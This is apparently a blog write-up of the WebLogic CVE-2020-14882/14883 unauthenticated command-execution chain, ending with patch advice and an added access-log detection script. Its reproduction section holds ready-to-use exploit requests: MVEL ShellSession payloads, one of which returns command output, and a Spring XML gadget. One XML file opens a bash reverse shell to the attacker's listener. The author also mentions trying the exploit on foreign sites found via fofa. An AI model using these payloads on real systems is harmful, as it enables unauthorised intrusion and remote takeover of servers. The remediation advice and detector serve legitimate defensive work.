WebLogic unauthenticated command execution (CVE-2020-14882)



Preface

I have been too busy lately with documents and all sorts of odds and ends. For the freshly disclosed WebLogic unauthenticated bug I picked a few foreign sites on fofa and tested them; there is nothing much going on today, so I decided to write an article to record it.

0x00 Vulnerability overview

An unauthenticated remote attacker can execute arbitrary code on an affected WebLogic Server with a single crafted HTTP GET request. Two bugs are chained. First, a double-encoded "../" placed under one of the console's unauthenticated static-resource directories (/console/images/, /console/css/) passes the console's authentication check, which looks at the raw path, and is then decoded and normalised into /console/console.portal (the authentication bypass, CVE-2020-14882). Second, the portal's handle parameter reflectively instantiates any class name given to it with a single String constructor argument; the payloads below feed it classes whose constructor runs attacker-controlled code (CVE-2020-14883). Together they give pre-auth RCE as the WebLogic service user.

0x01 Affected versions

  1. Oracle Weblogic Server 10.3.6.0.0

  2. Oracle Weblogic Server 12.1.3.0.0

  3. Oracle Weblogic Server 12.2.1.3.0

  4. Oracle Weblogic Server 12.2.1.4.0

  5. Oracle Weblogic Server 14.1.1.0.0

0x02 Reproduction

WebLogic 12 (the MVEL ShellSession class below comes from the Coherence library bundled with the newer releases; it is absent on 10.3.6, so use the XML gadget further down there)

POC 1 (blind: the command's output is not returned, so confirm execution through the DNS lookup that the ping triggers)

https://127.0.0.1//console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27ping *.dnslog.cn%27);%22)

POC 2 (not blind: the MVEL script reads the command from the cmd request header, runs it through cmd.exe /c or /bin/sh -c depending on os.name, and writes stdout back into the HTTP response)

GET /console/css/%252e%252e%2fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lang.reflect.Field%20field%20=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20obj%20=%20field.get(adapter);weblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(%22getServletRequest%22).invoke(obj);%20String%20cmd%20=%20req.getHeader(%22cmd%22);String[]%20cmds%20=%20System.getProperty(%22os.name%22).toLowerCase().contains(%22window%22)%20?%20new%20String[]{%22cmd.exe%22,%20%22/c%22,%20cmd}%20:%20new%20String[]{%22/bin/sh%22,%20%22-c%22,%20cmd};if(cmd%20!=%20null%20){%20String%20result%20=%20new%20java.util.Scanner(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22\\A%22).next();%20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req);res.getServletOutputStream().writeStream(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}%20currentThread.interrupt();%27) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
cmd: ifconfig
Connection: close

WebLogic 10.3.6 (Spring FileSystemXmlApplicationContext gadget; it is also usable on the 12.x releases since the repackaged Spring classes ship with every affected version)

http://127.0.0.1/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://127.0.0.1/poc.xml")

Windows XML (poc.xml)

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value>whoami</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Linux XML (poc.xml, reverse shell to 127.0.0.1:8888; replace with your listener)

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[bash -i >& /dev/tcp/127.0.0.1/8888 0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Usage: host the XML on an Internet-facing server (any server the target can reach will do), then request the constructed link. The fetch is performed by the WebLogic server itself, so it needs outbound access to the XML host; the bean is created while the Spring context loads and its init-method="start" launches the process, so no further interaction is needed.

0x03 Remediation

Apply Oracle's October 2020 Critical Patch Update. Note that this first fix was bypassed within days (CVE-2020-14750, patched out of band in November 2020), so install the latest patch set rather than the October one alone. Until patched, restrict /console to trusted networks: the administration console is the only attack surface for this chain, and on Internet-facing servers it should not be exposed at all.
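Patching aside, attempts are easy to hunt for in web server or WebLogic access logs, because the traversal has a fixed signature: a raw path under an unauthenticated static directory that, once decoded and normalised, resolves to a console portal, usually with a gadget class name in the handle or test_handle parameter. The following is an added example, not part of the original post; the log lines are constructed, and the hit criteria are this example's own and not an official signature.

```python
"""Hunt for CVE-2020-14882/14883 attempts in HTTP access logs.
Added example, not from the original post; the sample log is constructed."""
import posixpath
import re
import urllib.parse

# Gadget classes used by the public payloads above.
GADGETS = (
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support."
    "FileSystemXmlApplicationContext",
)
# Portals that need a console login, and the static directories that do not;
# an exploit path starts under one and normalises onto the other.
PROTECTED = ("/console/console.portal", "/console/consolejndi.portal")
UNAUTH_PREFIXES = ("/console/images/", "/console/css/")

# Common/combined log format: client ip, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample: two attempts followed by three benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Oct/2020:10:21:07 +0000] "GET /console/images/%252E%252E%252Fconsole.portal'
    '?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession'
    '(%22java.lang.Runtime.getRuntime().exec(%27id%27);%22) HTTP/1.1" 200 1843',
    '10.0.0.7 - - [29/Oct/2020:10:22:41 +0000] "GET /console/css/%252e%252e%2fconsolejndi.portal'
    '?test_handle=com.bea.core.repackaged.springframework.context.support.'
    'FileSystemXmlApplicationContext(%22http://203.0.113.9/poc.xml%22) HTTP/1.1" 200 512',
    '10.0.0.9 - - [29/Oct/2020:10:23:02 +0000] "GET /console/images/logo.png HTTP/1.1" 200 4096',
    '10.0.0.9 - - [29/Oct/2020:10:23:05 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2201',
    '10.0.0.9 - - [29/Oct/2020:10:24:30 +0000] "GET /console/console.portal'
    '?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 9120',
]


def fully_decode(s: str, rounds: int = 4) -> str:
    """Percent-decode until stable, so %252E -> %2E -> '.' is resolved."""
    for _ in range(rounds):
        d = urllib.parse.unquote(s)
        if d == s:
            break
        s = d
    return s


def query_params(query: str) -> dict:
    """Split on '&' only and decode once, mirroring the server's own parsing
    (parse_qs is avoided because the MVEL payloads contain ';')."""
    out = {}
    for part in query.split("&"):
        if part:
            k, _, v = part.partition("=")
            out[urllib.parse.unquote(k)] = urllib.parse.unquote(v)
    return out


def analyse(target: str) -> dict:
    """Decode, normalise and tag one request target with its reasons."""
    raw_path, _, query = target.partition("?")
    once = urllib.parse.unquote(raw_path)        # what the auth filter sees
    normalized = posixpath.normpath(fully_decode(once))  # what gets served
    params = query_params(query)
    handle = next((v for k, v in params.items() if k.endswith("handle")), "")
    reasons = []
    if re.search(r"%2[ef]", once, re.I):          # still encoded after one pass
        reasons.append("double_encoded")
    if raw_path.lower().startswith(UNAUTH_PREFIXES) and normalized.lower() in PROTECTED:
        reasons.append("auth_bypass")
    if any(g in handle for g in GADGETS):
        reasons.append("gadget")
    return {"raw_path": raw_path, "normalized": normalized,
            "handle": handle, "reasons": reasons}


def scan(lines) -> list:
    """Return one finding per log line that trips at least one reason."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        a = analyse(m.group("target"))
        if a["reasons"]:
            hits.append({"ip": m.group("ip"), "status": int(m.group("status")), **a})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["normalized"], hit["reasons"], hit["handle"][:60])
```

A 200 on a flagged line means the bypass succeeded and the handle was processed; treat the host as compromised and pull the gadget argument (command or XML URL) from the finding for follow-up. Run the scanner over the real access log by replacing SAMPLE_LOG with the file's lines.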
